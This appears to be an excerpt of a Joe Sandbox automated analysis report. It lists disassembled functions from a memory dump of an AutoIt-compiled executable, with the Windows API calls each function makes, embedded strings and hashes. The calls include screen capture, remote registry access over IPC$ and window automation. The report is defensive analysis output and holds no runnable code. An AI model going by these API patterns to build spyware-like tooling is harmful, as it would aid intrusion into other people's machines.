                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                                                                                                    • String ID: 0
                                                                                                                    • API String ID: 1296962147-4108050209
                                                                                                                    • Opcode ID: 3cfe7ec9e1b1abf521860415764739c443f5789640f924ecb2a6355b8ada3c2a
                                                                                                                    • Instruction ID: 36902af04788451f9f2073e09bea50354844a07ce210b68ec579676c715c9106
                                                                                                                    • Opcode Fuzzy Hash: 3cfe7ec9e1b1abf521860415764739c443f5789640f924ecb2a6355b8ada3c2a
                                                                                                                    • Instruction Fuzzy Hash: 3E81AE70618301AFDB26DF25C8D4A6BBBE8FF88714F00592EF995A7291C770D904CB92
                                                                                                                    APIs
                                                                                                                    • GetDC.USER32(00000000), ref: 0032738F
                                                                                                                    • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 0032739B
                                                                                                                    • CreateCompatibleDC.GDI32(?), ref: 003273A7
                                                                                                                    • SelectObject.GDI32(00000000,?), ref: 003273B4
                                                                                                                    • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00327408
                                                                                                                    • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 00327444
                                                                                                                    • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00327468
                                                                                                                    • SelectObject.GDI32(00000006,?), ref: 00327470
                                                                                                                    • DeleteObject.GDI32(?), ref: 00327479
                                                                                                                    • DeleteDC.GDI32(00000006), ref: 00327480
                                                                                                                    • ReleaseDC.USER32(00000000,?), ref: 0032748B
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                                                                    • String ID: (
                                                                                                                    • API String ID: 2598888154-3887548279
                                                                                                                    • Opcode ID: 3e1df811181ef815b4881ae641eeaecb3013cde1a118221522ebc698dddc2fda
                                                                                                                    • Instruction ID: e6afa65d93d2f8d5e78195edf77b6a96e1d5a3819c267c404ff36c18cff42c05
                                                                                                                    • Opcode Fuzzy Hash: 3e1df811181ef815b4881ae641eeaecb3013cde1a118221522ebc698dddc2fda
                                                                                                                    • Instruction Fuzzy Hash: D2514975904319EFCB16CFA9DC85EAEBBB9FF48310F14852DF95997220C731A9408B90
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 002D0957: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,002B6B0C,?,00008000), ref: 002D0973
                                                                                                                      • Part of subcall function 002B4750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,002B4743,?,?,002B37AE,?), ref: 002B4770
                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 002B6BAD
                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 002B6CFA
                                                                                                                      • Part of subcall function 002B586D: _wcscpy.LIBCMT ref: 002B58A5
                                                                                                                      • Part of subcall function 002D363D: _iswctype.LIBCMT ref: 002D3645
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                                                                                                                    • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                                                                                    • API String ID: 537147316-1018226102
                                                                                                                    • Opcode ID: 9ed8aea43191ab7f4eaee6f8720f3b60bcf1d7a463793d9a6d919ff95694c460
                                                                                                                    • Instruction ID: 0a29994f41960aea3a5d584020f8f3e88a170371a91e42c420f799c1b80dfb99
                                                                                                                    • Opcode Fuzzy Hash: 9ed8aea43191ab7f4eaee6f8720f3b60bcf1d7a463793d9a6d919ff95694c460
                                                                                                                    • Instruction Fuzzy Hash: 2202BE301283419FCB25EF20C891AEFBBE5AF98394F54491DF489972A1DB30D969CF42
                                                                                                                    APIs
                                                                                                                    • _memset.LIBCMT ref: 00312D50
                                                                                                                    • GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 00312DDD
                                                                                                                    • GetMenuItemCount.USER32(00375890), ref: 00312E66
                                                                                                                    • DeleteMenu.USER32(00375890,00000005,00000000,000000F5,?,?), ref: 00312EF6
                                                                                                                    • DeleteMenu.USER32(00375890,00000004,00000000), ref: 00312EFE
                                                                                                                    • DeleteMenu.USER32(00375890,00000006,00000000), ref: 00312F06
                                                                                                                    • DeleteMenu.USER32(00375890,00000003,00000000), ref: 00312F0E
                                                                                                                    • GetMenuItemCount.USER32(00375890), ref: 00312F16
                                                                                                                    • SetMenuItemInfoW.USER32(00375890,00000004,00000000,00000030), ref: 00312F4C
                                                                                                                    • GetCursorPos.USER32(?), ref: 00312F56
                                                                                                                    • SetForegroundWindow.USER32(00000000), ref: 00312F5F
                                                                                                                    • TrackPopupMenuEx.USER32(00375890,00000000,?,00000000,00000000,00000000), ref: 00312F72
                                                                                                                    • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00312F7E
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3993528054-0
                                                                                                                    • Opcode ID: 94261ebbb002243d8ad08c9b78e2ef3d0777616a4a171c6f086bcce40978a371
                                                                                                                    • Instruction ID: 33d6fbf4583821723f445ad7599712a103199855f9004a27a319894815c32136
                                                                                                                    • Opcode Fuzzy Hash: 94261ebbb002243d8ad08c9b78e2ef3d0777616a4a171c6f086bcce40978a371
                                                                                                                    • Instruction Fuzzy Hash: 7871B270640205BEEB2A9F54DC85FEBBF68FF09754F100216F625AA1E1C7B158B0DBA4
                                                                                                                    APIs
                                                                                                                    • VariantInit.OLEAUT32(?), ref: 003288D7
                                                                                                                    • CoInitialize.OLE32(00000000), ref: 00328904
                                                                                                                    • CoUninitialize.OLE32 ref: 0032890E
                                                                                                                    • GetRunningObjectTable.OLE32(00000000,?), ref: 00328A0E
                                                                                                                    • SetErrorMode.KERNEL32(00000001,00000029), ref: 00328B3B
                                                                                                                    • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,00342C0C), ref: 00328B6F
                                                                                                                    • CoGetObject.OLE32(?,00000000,00342C0C,?), ref: 00328B92
                                                                                                                    • SetErrorMode.KERNEL32(00000000), ref: 00328BA5
                                                                                                                    • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00328C25
                                                                                                                    • VariantClear.OLEAUT32(?), ref: 00328C35
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                                                                                    • String ID: ,,4
                                                                                                                    • API String ID: 2395222682-3600021901
                                                                                                                    • Opcode ID: a50f1d511d243d59140c95b134d68331f47bc56fed69ec3e89a763f676f48180
                                                                                                                    • Instruction ID: a32f086abc5696d52eefabeefedc6b5fbcc95c5b1cb56219d402d68760ed82be
                                                                                                                    • Opcode Fuzzy Hash: a50f1d511d243d59140c95b134d68331f47bc56fed69ec3e89a763f676f48180
                                                                                                                    • Instruction Fuzzy Hash: 2AC156B1608315AFC701DF68D88496BB7E9FF89348F00492DF98A9B261DB71ED05CB52
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 002B7BCC: _memmove.LIBCMT ref: 002B7C06
                                                                                                                    • _memset.LIBCMT ref: 0030786B
                                                                                                                    • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 003078A0
                                                                                                                    • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 003078BC
                                                                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 003078D8
                                                                                                                    • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00307902
                                                                                                                    • CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 0030792A
                                                                                                                    • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00307935
                                                                                                                    • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0030793A
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
                                                                                                                    • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                                                                    • API String ID: 1411258926-22481851
                                                                                                                    • Opcode ID: 7204bf3ddd634f2f5f01a1f828af662f05e75b1001d8d5fc1335a6b274585a59
                                                                                                                    • Instruction ID: 62ae5003f095c7e76eedf8ee4f689fc5f27371f69f7798a8c564a7f6fcd133cc
                                                                                                                    • Opcode Fuzzy Hash: 7204bf3ddd634f2f5f01a1f828af662f05e75b1001d8d5fc1335a6b274585a59
                                                                                                                    • Instruction Fuzzy Hash: DF411872C24229ABCF16EBA4DC95DEDB778BF44350F444029E915A71A1DB30AD14CF90
                                                                                                                    APIs
                                                                                                                    • CharUpperBuffW.USER32(?,?,?,?,?,?,?,0032FDAD,?,?), ref: 00330E31
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: BuffCharUpper
                                                                                                                    • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                                                                    • API String ID: 3964851224-909552448
                                                                                                                    • Opcode ID: a344ae604c684470aa547f707e7da2ad8bda6a39cd3c5d603438248d2fbb375e
                                                                                                                    • Instruction ID: 468ec478cd3048f6b05029f8e29aac7f5ed1798dab3cc86531262dc8c1ab931e
                                                                                                                    • Opcode Fuzzy Hash: a344ae604c684470aa547f707e7da2ad8bda6a39cd3c5d603438248d2fbb375e
                                                                                                                    • Instruction Fuzzy Hash: 6F417E3522024A8BCF16EF10D8E5BEF3768BF51344F154456FD951B2A6DB309D2ACBA0
                                                                                                                    APIs
                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,002EE2A0,00000010,?,Bad directive syntax error,0033F910,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 0030F7C2
                                                                                                                    • LoadStringW.USER32(00000000,?,002EE2A0,00000010), ref: 0030F7C9
                                                                                                                      • Part of subcall function 002B7DE1: _memmove.LIBCMT ref: 002B7E22
                                                                                                                    • _wprintf.LIBCMT ref: 0030F7FC
                                                                                                                    • __swprintf.LIBCMT ref: 0030F81E
                                                                                                                    • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 0030F88D
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: HandleLoadMessageModuleString__swprintf_memmove_wprintf
                                                                                                                    • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                                                                    • API String ID: 1506413516-4153970271
                                                                                                                    • Opcode ID: 5668af4853d01caaf1d94231c5625e3e45ae3c7a630aa3e9212782c3929a62c1
                                                                                                                    • Instruction ID: 23f694264509e77e8eaed9fc3e1eb1302f94892b7017fee59726736bd16286a6
                                                                                                                    • Opcode Fuzzy Hash: 5668af4853d01caaf1d94231c5625e3e45ae3c7a630aa3e9212782c3929a62c1
                                                                                                                    • Instruction Fuzzy Hash: DE214F3195021AAFCF12EF90CC5AEED7779BF18300F044466F515661A2DA719A28DF51
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 002B7BCC: _memmove.LIBCMT ref: 002B7C06
                                                                                                                      • Part of subcall function 002B7924: _memmove.LIBCMT ref: 002B79AD
                                                                                                                    • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00315330
                                                                                                                    • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00315346
                                                                                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00315357
                                                                                                                    • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00315369
                                                                                                                    • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0031537A
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: SendString$_memmove
                                                                                                                    • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                                                                    • API String ID: 2279737902-1007645807
                                                                                                                    • Opcode ID: 3f69475ecd1f6cc04d22d9271b08f071bce8689b95525b9224c0488dd4d35550
                                                                                                                    • Instruction ID: c34cc5947e98bd7f0daf0eb38a58661e945ff558f060dd47c4dd4adec1cfed5e
                                                                                                                    • Opcode Fuzzy Hash: 3f69475ecd1f6cc04d22d9271b08f071bce8689b95525b9224c0488dd4d35550
                                                                                                                    • Instruction Fuzzy Hash: AF11B220A6012979D725B761CC4AEFF7B7CEBD9B80F000929B411A20D5DEA00D55C9A0
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                                                                                    • String ID: 0.0.0.0
                                                                                                                    • API String ID: 208665112-3771769585
                                                                                                                    • Opcode ID: 11aff9e2c770ad469f67fd374f9858be5ead48c1f9c0d078cee320cd65c4b034
                                                                                                                    • Instruction ID: 39e3e2251c313877845ab9871d91d229a04e57f24b06e61bc3c2d7331055cd55
                                                                                                                    • Opcode Fuzzy Hash: 11aff9e2c770ad469f67fd374f9858be5ead48c1f9c0d078cee320cd65c4b034
                                                                                                                    • Instruction Fuzzy Hash: 1411D231900114AFCB2ABB70DC8AEEA77BCEB1A711F4441B6F455961A1EF708EC18A60
                                                                                                                    APIs
                                                                                                                    • timeGetTime.WINMM ref: 00314F7A
                                                                                                                      • Part of subcall function 002D049F: timeGetTime.WINMM(?,75A8B400,002C0E7B), ref: 002D04A3
                                                                                                                    • Sleep.KERNEL32(0000000A), ref: 00314FA6
                                                                                                                    • EnumThreadWindows.USER32(?,Function_00064F28,00000000), ref: 00314FCA
                                                                                                                    • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00314FEC
                                                                                                                    • SetActiveWindow.USER32 ref: 0031500B
                                                                                                                    • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00315019
                                                                                                                    • SendMessageW.USER32(00000010,00000000,00000000), ref: 00315038
                                                                                                                    • Sleep.KERNEL32(000000FA), ref: 00315043
                                                                                                                    • IsWindow.USER32 ref: 0031504F
                                                                                                                    • EndDialog.USER32(00000000), ref: 00315060
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                                                                    • String ID: BUTTON
                                                                                                                    • API String ID: 1194449130-3405671355
                                                                                                                    • Opcode ID: 850fc269bbe058077f395c2098f43f76766a0d926f286c3bfd031c5769132941
                                                                                                                    • Instruction ID: 3755e8d80b9b63c959a070df89cd20f72376eb05e03d8dc9dadcd21e0b442dbc
                                                                                                                    • Opcode Fuzzy Hash: 850fc269bbe058077f395c2098f43f76766a0d926f286c3bfd031c5769132941
                                                                                                                    • Instruction Fuzzy Hash: E921C670A00A04EFE72B5F60EDCAF663B6DEB4E755F441028F109812B1EB718DD49A61
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 002B9837: __itow.LIBCMT ref: 002B9862
                                                                                                                      • Part of subcall function 002B9837: __swprintf.LIBCMT ref: 002B98AC
                                                                                                                    • CoInitialize.OLE32(00000000), ref: 0031D5EA
                                                                                                                    • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 0031D67D
                                                                                                                    • SHGetDesktopFolder.SHELL32(?), ref: 0031D691
                                                                                                                    • CoCreateInstance.OLE32(00342D7C,00000000,00000001,00368C1C,?), ref: 0031D6DD
                                                                                                                    • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 0031D74C
                                                                                                                    • CoTaskMemFree.OLE32(?,?), ref: 0031D7A4
                                                                                                                    • _memset.LIBCMT ref: 0031D7E1
                                                                                                                    • SHBrowseForFolderW.SHELL32(?), ref: 0031D81D
                                                                                                                    • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 0031D840
                                                                                                                    • CoTaskMemFree.OLE32(00000000), ref: 0031D847
                                                                                                                    • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 0031D87E
                                                                                                                    • CoUninitialize.OLE32(00000001,00000000), ref: 0031D880
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1246142700-0
                                                                                                                    • Opcode ID: f88e4b8b435c23c81687af63f9d0fbfdbb1a8ca181e96196259e975cd9e7806e
                                                                                                                    • Instruction ID: e88bf825a0a73121aa70b9be7d7af1f348f24c4d0f8f87072b4dd40c9bb12bd2
                                                                                                                    • Opcode Fuzzy Hash: f88e4b8b435c23c81687af63f9d0fbfdbb1a8ca181e96196259e975cd9e7806e
                                                                                                                    • Instruction Fuzzy Hash: E8B1E975A00109AFDB05DFA4C885DAEBBB9EF49314F148469F909EB261DB30ED81CF50
                                                                                                                    APIs
                                                                                                                    • GetDlgItem.USER32(?,00000001), ref: 0030C283
                                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 0030C295
                                                                                                                    • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 0030C2F3
                                                                                                                    • GetDlgItem.USER32(?,00000002), ref: 0030C2FE
                                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 0030C310
                                                                                                                    • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 0030C364
                                                                                                                    • GetDlgItem.USER32(?,000003E9), ref: 0030C372
                                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 0030C383
                                                                                                                    • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 0030C3C6
                                                                                                                    • GetDlgItem.USER32(?,000003EA), ref: 0030C3D4
                                                                                                                    • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 0030C3F1
                                                                                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 0030C3FE
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$ItemMoveRect$Invalidate
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3096461208-0
